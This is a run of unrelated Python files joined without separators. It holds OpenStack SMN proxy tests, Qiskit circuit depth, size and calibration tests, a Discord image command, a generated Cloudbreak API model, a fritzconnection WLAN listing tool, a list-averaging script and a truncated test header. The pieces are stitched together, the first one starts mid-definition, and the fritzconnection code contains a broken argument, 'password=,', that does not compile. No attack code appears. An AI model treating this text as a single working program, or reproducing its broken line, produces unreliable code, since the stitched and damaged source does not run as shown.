test_delete_topic_attr(self): topic_attr_dict = {'topic_urn': 'fakeurn'} topic_attr = _topic.TopicAttr(**topic_attr_dict) attrname = 'attr' self._verify2('openstack.proxy2.BaseProxy._delete', self.proxy.delete_topic_attr, method_args=[topic_attr, attrname], expected_args=[mock.ANY, topic_attr], expected_kwargs={'topic_urn': 'fakeurn', 'attributes_name': attrname}) def test_delete_topic_attrs(self): self._verify2('openstack.smn.v2.topic.TopicAttr.delete_all', self.proxy.delete_topic_attrs, method_args=['topic_urn'], expected_args=[mock.ANY], expected_kwargs={'topic_urn': 'topic_urn'}) def test_subscriptions(self): self.verify_list(self.proxy.subscriptions, _subscription.Subscription) def test_subscript_topic(self): self._verify2('openstack.proxy2.BaseProxy._create', self.proxy.subscript_topic, method_args=["topic_urn"], expected_args=[mock.ANY], expected_kwargs={'topic_urn': 'topic_urn'}) def test_unsubscript_topic(self): self.verify_delete(self.proxy.unsubscript_topic, _subscription.Subscription, True) def test_confirm_subcription(self): pass def test_create_message_template(self): self.verify_create(self.proxy.create_message_template, _message_template.MessageTemplate) def test_message_templates(self): self.verify_list(self.proxy.message_templates, _message_template.MessageTemplate, paginated=False) def test_get_message_template(self): self.verify_get(self.proxy.get_message_template, _message_template.MessageTemplate) def test_update_message_template(self): self.verify_update(self.proxy.update_message_template, _message_template.MessageTemplate) def test_delete_message_template(self): self.verify_delete(self.proxy.delete_message_template, _message_template.MessageTemplate, True) def test_publish_topic(self): pass def test_direct_publish(self): pass # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2018. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Test Qiskit's inverse gate operation.""" import unittest import numpy as np from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, pulse from qiskit.circuit.library import RXGate, RYGate from qiskit.test import QiskitTestCase from qiskit.circuit.exceptions import CircuitError # pylint: disable=unused-import from qiskit.extensions.simulator import Snapshot class TestCircuitProperties(QiskitTestCase): """QuantumCircuit properties tests.""" def test_qarg_numpy_int(self): """Test castable to integer args for QuantumCircuit. """ n = np.int64(12) qc1 = QuantumCircuit(n) self.assertEqual(qc1.num_qubits, 12) self.assertEqual(type(qc1), QuantumCircuit) def test_carg_numpy_int(self): """Test castable to integer cargs for QuantumCircuit. """ n = np.int64(12) c1 = ClassicalRegister(n) qc1 = QuantumCircuit(c1) c_regs = qc1.cregs self.assertEqual(c_regs[0], c1) self.assertEqual(type(qc1), QuantumCircuit) def test_carg_numpy_int_2(self): """Test castable to integer cargs for QuantumCircuit. """ qc1 = QuantumCircuit(12, np.int64(12)) c_regs = qc1.cregs self.assertEqual(c_regs[0], ClassicalRegister(12, 'c')) self.assertEqual(type(qc1), QuantumCircuit) def test_qarg_numpy_int_exception(self): """Test attempt to pass non-castable arg to QuantumCircuit. """ self.assertRaises(CircuitError, QuantumCircuit, 'string') def test_warning_on_noninteger_float(self): """Test warning when passing non-integer float to QuantumCircuit """ self.assertRaises(CircuitError, QuantumCircuit, 2.2) # but an integer float should pass qc = QuantumCircuit(2.0) self.assertEqual(qc.num_qubits, 2) def test_circuit_depth_empty(self): """Test depth of empty circuity """ q = QuantumRegister(5, 'q') qc = QuantumCircuit(q) self.assertEqual(qc.depth(), 0) def test_circuit_depth_no_reg(self): """Test depth of no register circuits """ qc = QuantumCircuit() self.assertEqual(qc.depth(), 0) def test_circuit_depth_meas_only(self): """Test depth of measurement only """ q = QuantumRegister(1, 'q') c = ClassicalRegister(1, 'c') qc = QuantumCircuit(q, c) qc.measure(q, c) self.assertEqual(qc.depth(), 1) def test_circuit_depth_barrier(self): """Make sure barriers do not add to depth """ q = QuantumRegister(5, 'q') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.h(q[4]) qc.cx(q[0], q[1]) qc.cx(q[1], q[4]) qc.cx(q[4], q[2]) qc.cx(q[2], q[3]) qc.barrier(q) qc.measure(q, c) self.assertEqual(qc.depth(), 6) def test_circuit_depth_simple(self): """Test depth for simple circuit """ q = QuantumRegister(5, 'q') c = ClassicalRegister(1, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.cx(q[0], q[4]) qc.x(q[2]) qc.x(q[2]) qc.x(q[2]) qc.x(q[4]) qc.cx(q[4], q[1]) qc.measure(q[1], c[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_multi_reg(self): """Test depth for multiple registers """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q1, q2, c) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_3q_gate(self): """Test depth for 3q gate """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q1, q2, c) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.ccx(q2[1], q1[0], q2[0]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.depth(), 6) def test_circuit_depth_conditionals1(self): """Test circuit depth for conditional gates #1. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[0], q[1]) qc.cx(q[2], q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.h(q[2]).c_if(c, 2) qc.h(q[3]).c_if(c, 4) self.assertEqual(qc.depth(), 5) def test_circuit_depth_conditionals2(self): """Test circuit depth for conditional gates #2. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[0], q[1]) qc.cx(q[2], q[3]) qc.measure(q[0], c[0]) qc.measure(q[0], c[0]) qc.h(q[2]).c_if(c, 2) qc.h(q[3]).c_if(c, 4) self.assertEqual(qc.depth(), 6) def test_circuit_depth_conditionals3(self): """Test circuit depth for conditional gates #3. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.cx(q[0], q[3]).c_if(c, 2) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.depth(), 4) def test_circuit_depth_measurements1(self): """Test circuit depth for measurements #1. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.depth(), 2) def test_circuit_depth_measurements2(self): """Test circuit depth for measurements #2. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[0], c[1]) qc.measure(q[0], c[2]) qc.measure(q[0], c[3]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_measurements3(self): """Test circuit depth for measurements #3. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[0]) qc.measure(q[2], c[0]) qc.measure(q[3], c[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_barriers1(self): """Test circuit depth for barriers #1. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.barrier(q) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_barriers2(self): """Test circuit depth for barriers #2. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.barrier(q) circ.cx(0, 1) circ.barrier(q) circ.h(2) circ.barrier(q) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_barriers3(self): """Test circuit depth for barriers #3. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.barrier(q) circ.cx(0, 1) circ.barrier(q) circ.barrier(q) circ.barrier(q) circ.h(2) circ.barrier(q) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap1(self): """Test circuit depth for snapshots #1. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.append(Snapshot('snap', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap2(self): """Test circuit depth for snapshots #2. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.append(Snapshot('snap0', num_qubits=4), [0, 1, 2, 3]) circ.cx(0, 1) circ.append(Snapshot('snap1', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.append(Snapshot('snap2', num_qubits=4), [0, 1, 2, 3]) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap3(self): """Test circuit depth for snapshots #3. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.append(Snapshot('snap0', num_qubits=4), [0, 1, 2, 3]) circ.append(Snapshot('snap1', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_size_empty(self): """Circuit.size should return 0 for an empty circuit.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) self.assertEqual(qc.size(), 0) def test_circuit_size_single_qubit_gates(self): """Circuit.size should increment for each added single qubit gate.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) self.assertEqual(qc.size(), 1) qc.h(q[1]) self.assertEqual(qc.size(), 2) def test_circuit_size_two_qubit_gates(self): """Circuit.size should increment for each added two qubit gate.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.cx(q[0], q[1]) self.assertEqual(qc.size(), 1) qc.cx(q[2], q[3]) self.assertEqual(qc.size(), 2) def test_circuit_size_ignores_barriers_snapshots(self): """Circuit.size should not count barriers or snapshots.""" q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.cx(q[0], q[1]) self.assertEqual(qc.size(), 2) qc.barrier(q) self.assertEqual(qc.size(), 2) qc.append(Snapshot('snapshot_label', num_qubits=4), [0, 1, 2, 3]) self.assertEqual(qc.size(), 2) def test_circuit_count_ops(self): """Test circuit count ops. """ q = QuantumRegister(6, 'q') qc = QuantumCircuit(q) qc.h(q) qc.x(q[1]) qc.y(q[2:4]) qc.z(q[3:]) result = qc.count_ops() expected = dict([('h', 6), ('z', 3), ('y', 2), ('x', 1)]) self.assertIsInstance(result, dict) self.assertEqual(expected, result) def test_circuit_nonlocal_gates(self): """Test num_nonlocal_gates. """ q = QuantumRegister(6, 'q') c = ClassicalRegister(2, 'c') qc = QuantumCircuit(q, c) qc.h(q) qc.x(q[1]) qc.cry(0.1, q[2], q[4]) qc.z(q[3:]) qc.cswap(q[1], q[2], q[3]) qc.iswap(q[0], q[4]).c_if(c, 2) result = qc.num_nonlocal_gates() expected = 3 self.assertEqual(expected, result) def test_circuit_nonlocal_gates_no_instruction(self): """Verify num_nunlocal_gates does not include barriers. """ # ref: https://github.com/Qiskit/qiskit-terra/issues/4500 n = 3 qc = QuantumCircuit(n) qc.h(range(n)) qc.barrier() self.assertEqual(qc.num_nonlocal_gates(), 0) def test_circuit_connected_components_empty(self): """Verify num_connected_components is width for empty """ q = QuantumRegister(7, 'q') qc = QuantumCircuit(q) self.assertEqual(7, qc.num_connected_components()) def test_circuit_connected_components_multi_reg(self): """Test tensor factors works over multi registers """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') qc = QuantumCircuit(q1, q2) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.num_connected_components(), 1) def test_circuit_connected_components_multi_reg2(self): """Test tensor factors works over multi registers #2. """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') qc = QuantumCircuit(q1, q2) qc.cx(q1[0], q2[1]) qc.cx(q2[0], q1[2]) qc.cx(q1[1], q2[0]) self.assertEqual(qc.num_connected_components(), 2) def test_circuit_connected_components_disconnected(self): """Test tensor factors works with 2q subspaces. """ q1 = QuantumRegister(5, 'q1') q2 = QuantumRegister(5, 'q2') qc = QuantumCircuit(q1, q2) qc.cx(q1[0], q2[4]) qc.cx(q1[1], q2[3]) qc.cx(q1[2], q2[2]) qc.cx(q1[3], q2[1]) qc.cx(q1[4], q2[0]) self.assertEqual(qc.num_connected_components(), 5) def test_circuit_connected_components_with_clbits(self): """Test tensor components with classical register. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_connected_components(), 4) def test_circuit_connected_components_with_cond(self): """Test tensor components with conditional gate. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.cx(q[0], q[3]).c_if(c, 2) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_connected_components(), 1) def test_circuit_unitary_factors1(self): """Test unitary factors empty circuit. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) self.assertEqual(qc.num_unitary_factors(), 4) def test_circuit_unitary_factors2(self): """Test unitary factors multi qregs """ q1 = QuantumRegister(2, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(4, 'c') qc = QuantumCircuit(q1, q2, c) self.assertEqual(qc.num_unitary_factors(), 4) def test_circuit_unitary_factors3(self): """Test unitary factors measurements and conditionals. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[1], q[2]) qc.cx(q[1], q[2]) qc.cx(q[0], q[3]).c_if(c, 2) qc.cx(q[0], q[3]) qc.cx(q[0], q[3]) qc.cx(q[0], q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_unitary_factors(), 2) def test_circuit_unitary_factors4(self): """Test unitary factors measurements go to same cbit. """ size = 5 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[0]) qc.measure(q[2], c[0]) qc.measure(q[3], c[0]) self.assertEqual(qc.num_unitary_factors(), 5) def test_num_qubits_qubitless_circuit(self): """Check output in absence of qubits. """ c_reg = ClassicalRegister(3) circ = QuantumCircuit(c_reg) self.assertEqual(circ.num_qubits, 0) def test_num_qubits_qubitfull_circuit(self): """Check output in presence of qubits """ q_reg = QuantumRegister(4) c_reg = ClassicalRegister(3) circ = QuantumCircuit(q_reg, c_reg) self.assertEqual(circ.num_qubits, 4) def test_num_qubits_registerless_circuit(self): """Check output for circuits with direct argument for qubits. """ circ = QuantumCircuit(5) self.assertEqual(circ.num_qubits, 5) def test_num_qubits_multiple_register_circuit(self): """Check output for circuits with multiple quantum registers. """ q_reg1 = QuantumRegister(5) q_reg2 = QuantumRegister(6) q_reg3 = QuantumRegister(7) circ = QuantumCircuit(q_reg1, q_reg2, q_reg3) self.assertEqual(circ.num_qubits, 18) def test_calibrations_basis_gates(self): """Check if the calibrations for basis gates provided are added correctly.""" circ = QuantumCircuit(2) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) with pulse.build() as q1_y90: pulse.play(pulse.library.Gaussian(20, -1.0, 3.0), pulse.DriveChannel(1)) # Add calibration circ.add_calibration(RXGate(3.14), [0], q0_x180) circ.add_calibration(RYGate(1.57), [1], q1_y90) self.assertEqual(set(circ.calibrations.keys()), {'rx', 'ry'}) self.assertEqual(set(circ.calibrations['rx'].keys()), {((0,), (3.14,))}) self.assertEqual(set(circ.calibrations['ry'].keys()), {((1,), (1.57,))}) self.assertEqual(circ.calibrations['rx'][((0,), (3.14,))].instructions, q0_x180.instructions) self.assertEqual(circ.calibrations['ry'][((1,), (1.57,))].instructions, q1_y90.instructions) def test_calibrations_custom_gates(self): """Check if the calibrations for custom gates with params provided are added correctly.""" circ = QuantumCircuit(3) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) # Add calibrations with a custom gate 'rxt' circ.add_calibration('rxt', [0], q0_x180, params=[1.57, 3.14, 4.71]) self.assertEqual(set(circ.calibrations.keys()), {'rxt'}) self.assertEqual(set(circ.calibrations['rxt'].keys()), {((0,), (1.57, 3.14, 4.71))}) self.assertEqual(circ.calibrations['rxt'][((0,), (1.57, 3.14, 4.71))].instructions, q0_x180.instructions) def test_calibrations_no_params(self): """Check calibrations if the no params is provided with just gate name.""" circ = QuantumCircuit(3) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) circ.add_calibration('h', [0], q0_x180) self.assertEqual(set(circ.calibrations.keys()), {'h'}) self.assertEqual(set(circ.calibrations['h'].keys()), {((0,), ())}) self.assertEqual(circ.calibrations['h'][((0,), ())].instructions, q0_x180.instructions) if __name__ == '__main__': unittest.main() modules/htm.py1-10 from client import client import discord @client.command(trigger="htm") async def handle(command: str, message: discord.Message): e = discord.Embed(title="htm irl", description=discord.Embed.Empty, colour=discord.Embed.Empty) e.set_image(url="https://cdn.discordapp.com/attachments/377206780700393473/469686997066317824/unknown.png") e.set_footer(text="Command idea by @Hunter#4540") await message.channel.send(embed=e) return # coding: utf-8 """ Cloudbreak API Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: http://hortonworks.com/apache/cloudbreak/ OpenAPI spec version: 2.9.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class BaseImageResponse(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'hdp_stacks': 'list[StackDetailsJson]', 'hdf_stacks': 'list[StackDetailsJson]', '_date': 'str', 'description': 'str', 'os': 'str', 'os_type': 'str', 'uuid': 'str', 'version': 'str', 'repo': 'dict(str, str)', 'images': 'dict(str, dict(str, str))', 'stack_details': 'StackDetailsJson', 'default_image': 'bool', 'package_versions': 'dict(str, str)' } attribute_map = { 'hdp_stacks': 'hdpStacks', 'hdf_stacks': 'hdfStacks', '_date': 'date', 'description': 'description', 'os': 'os', 'os_type': 'osType', 'uuid': 'uuid', 'version': 'version', 'repo': 'repo', 'images': 'images', 'stack_details': 'stackDetails', 'default_image': 'defaultImage', 'package_versions': 'packageVersions' } def __init__(self, hdp_stacks=None, hdf_stacks=None, _date=None, description=None, os=None, os_type=None, uuid=None, version=None, repo=None, images=None, stack_details=None, default_image=False, package_versions=None): """ BaseImageResponse - a model defined in Swagger """ self._hdp_stacks = None self._hdf_stacks = None self.__date = None self._description = None self._os = None self._os_type = None self._uuid = None self._version = None self._repo = None self._images = None self._stack_details = None self._default_image = None self._package_versions = None if hdp_stacks is not None: self.hdp_stacks = hdp_stacks if hdf_stacks is not None: self.hdf_stacks = hdf_stacks if _date is not None: self._date = _date if description is not None: self.description = description if os is not None: self.os = os if os_type is not None: self.os_type = os_type if uuid is not None: self.uuid = uuid if version is not None: self.version = version if repo is not None: self.repo = repo if images is not None: self.images = images if stack_details is not None: self.stack_details = stack_details if default_image is not None: self.default_image = default_image if package_versions is not None: self.package_versions = package_versions @property def hdp_stacks(self): """ Gets the hdp_stacks of this BaseImageResponse. :return: The hdp_stacks of this BaseImageResponse. :rtype: list[StackDetailsJson] """ return self._hdp_stacks @hdp_stacks.setter def hdp_stacks(self, hdp_stacks): """ Sets the hdp_stacks of this BaseImageResponse. :param hdp_stacks: The hdp_stacks of this BaseImageResponse. :type: list[StackDetailsJson] """ self._hdp_stacks = hdp_stacks @property def hdf_stacks(self): """ Gets the hdf_stacks of this BaseImageResponse. :return: The hdf_stacks of this BaseImageResponse. :rtype: list[StackDetailsJson] """ return self._hdf_stacks @hdf_stacks.setter def hdf_stacks(self, hdf_stacks): """ Sets the hdf_stacks of this BaseImageResponse. :param hdf_stacks: The hdf_stacks of this BaseImageResponse. :type: list[StackDetailsJson] """ self._hdf_stacks = hdf_stacks @property def _date(self): """ Gets the _date of this BaseImageResponse. :return: The _date of this BaseImageResponse. :rtype: str """ return self.__date @_date.setter def _date(self, _date): """ Sets the _date of this BaseImageResponse. :param _date: The _date of this BaseImageResponse. :type: str """ self.__date = _date @property def description(self): """ Gets the description of this BaseImageResponse. :return: The description of this BaseImageResponse. :rtype: str """ return self._description @description.setter def description(self, description): """ Sets the description of this BaseImageResponse. :param description: The description of this BaseImageResponse. :type: str """ self._description = description @property def os(self): """ Gets the os of this BaseImageResponse. :return: The os of this BaseImageResponse. :rtype: str """ return self._os @os.setter def os(self, os): """ Sets the os of this BaseImageResponse. :param os: The os of this BaseImageResponse. :type: str """ self._os = os @property def os_type(self): """ Gets the os_type of this BaseImageResponse. :return: The os_type of this BaseImageResponse. :rtype: str """ return self._os_type @os_type.setter def os_type(self, os_type): """ Sets the os_type of this BaseImageResponse. :param os_type: The os_type of this BaseImageResponse. :type: str """ self._os_type = os_type @property def uuid(self): """ Gets the uuid of this BaseImageResponse. :return: The uuid of this BaseImageResponse. :rtype: str """ return self._uuid @uuid.setter def uuid(self, uuid): """ Sets the uuid of this BaseImageResponse. :param uuid: The uuid of this BaseImageResponse. :type: str """ self._uuid = uuid @property def version(self): """ Gets the version of this BaseImageResponse. :return: The version of this BaseImageResponse. :rtype: str """ return self._version @version.setter def version(self, version): """ Sets the version of this BaseImageResponse. :param version: The version of this BaseImageResponse. :type: str """ self._version = version @property def repo(self): """ Gets the repo of this BaseImageResponse. :return: The repo of this BaseImageResponse. :rtype: dict(str, str) """ return self._repo @repo.setter def repo(self, repo): """ Sets the repo of this BaseImageResponse. :param repo: The repo of this BaseImageResponse. :type: dict(str, str) """ self._repo = repo @property def images(self): """ Gets the images of this BaseImageResponse. :return: The images of this BaseImageResponse. :rtype: dict(str, dict(str, str)) """ return self._images @images.setter def images(self, images): """ Sets the images of this BaseImageResponse. :param images: The images of this BaseImageResponse. :type: dict(str, dict(str, str)) """ self._images = images @property def stack_details(self): """ Gets the stack_details of this BaseImageResponse. :return: The stack_details of this BaseImageResponse. :rtype: StackDetailsJson """ return self._stack_details @stack_details.setter def stack_details(self, stack_details): """ Sets the stack_details of this BaseImageResponse. :param stack_details: The stack_details of this BaseImageResponse. :type: StackDetailsJson """ self._stack_details = stack_details @property def default_image(self): """ Gets the default_image of this BaseImageResponse. :return: The default_image of this BaseImageResponse. :rtype: bool """ return self._default_image @default_image.setter def default_image(self, default_image): """ Sets the default_image of this BaseImageResponse. :param default_image: The default_image of this BaseImageResponse. :type: bool """ self._default_image = default_image @property def package_versions(self): """ Gets the package_versions of this BaseImageResponse. :return: The package_versions of this BaseImageResponse. :rtype: dict(str, str) """ return self._package_versions @package_versions.setter def package_versions(self, package_versions): """ Sets the package_versions of this BaseImageResponse. :param package_versions: The package_versions of this BaseImageResponse. :type: dict(str, str) """ self._package_versions = package_versions def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, BaseImageResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other 1-10 class Namespace: def __init__(self, rooms, emit_fn): self.rooms = rooms self.emit_fn = emit_fn def validate(self, room_id, speaker_id): room = self.rooms.get(room_id) return not (room is None or speaker_id not in room.participants) def register_socket_endpoints(self, socketio): pass def register_rest_endpoints(self, app): pass fritzconnection/cli/fritzwlan.py0 import argparse import itertools from ..lib.fritzwlan import ( FritzWLAN, SERVICE, ) from ..core.exceptions import FritzServiceError from ..core.fritzconnection import ( FRITZ_IP_ADDRESS, FRITZ_TCP_PORT, ) def get_header(): index = 'index' status = 'active' mac = 'mac' ip = 'ip' signal = 'signal' speed = 'speed' return f'{index:>5}{status:>8}{mac:>20}{ip:>18}{signal:>8}{speed:>8}' def report_wlanconfiguration(fw, extension): fw.service = extension host_informations = fw.get_hosts_info() if host_informations: print(f'Hosts registered at {SERVICE}{extension}:') print(f'WLAN name: {fw.ssid}') print(f'channel : {fw.channel}') print(get_header()) for info in host_informations: index = info['index'] status = info['status'] mac = info['mac'] ip = info['ip'] signal = info['signal'] speed = info['speed'] print(f'{index:>5}{status:>8}{mac:>20}{ip:>18}{signal:>8}{speed:>8}') print() def report_devices(arguments): fw = FritzWLAN(address=arguments.address, port=arguments.port, user=arguments.username, password=, service=arguments.service) print(fw.fc) if arguments.service: try: report_wlanconfiguration(fw, arguments.service) except FritzServiceError as err: print(f'Error: {err}') else: for n in itertools.count(1): try: report_wlanconfiguration(fw, n) except FritzServiceError: break def get_cli_arguments(): parser = argparse.ArgumentParser(description='FritzBox HomeAuto') parser.add_argument('-i', '--ip-address', nargs='?', default=None, const=None, dest='address', help='ip-address of the FritzBox to connect to. ' 'Default: %s' % FRITZ_IP_ADDRESS) parser.add_argument('--port', nargs='?', default=None, const=None, dest='port', help='port of the FritzBox to connect to. ' 'Default: %s' % FRITZ_TCP_PORT) parser.add_argument('-u', '--username', nargs='?', default=None, const=None, help='Fritzbox authentication username') parser.add_argument('-p', '--password', nargs='?', default=None, const=None, help='Fritzbox authentication password') parser.add_argument('-s', '--service', nargs='?', default=0, const=None, help='WLANConfiguration service number') args = parser.parse_args() return args def main(): arguments = get_cli_arguments() if not arguments.password: print('Exit: password required.') else: report_devices(arguments) if __name__ == '__main__': main() # This program calculates the average of the values # in a list. def main(): # Create a list. scores = [2.5, 7.3, 6.5, 4.0, 5.2] # Create a variable to use as an accumulator. total = 0.0 # Calculate the total of the list elements. for value in scores: total += value # Calculate the average of the elements. average = total / len(scores) # Display the total of the list elements. print('The average of the elements is', average) # Call the main function. main() parallel_accel/Server/test/redis/test_jobs.py # Copyright 2021 The ParallelAccel Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= # pylint: disable=too-many-public-methods, wrong-import-order """Unit test for manager 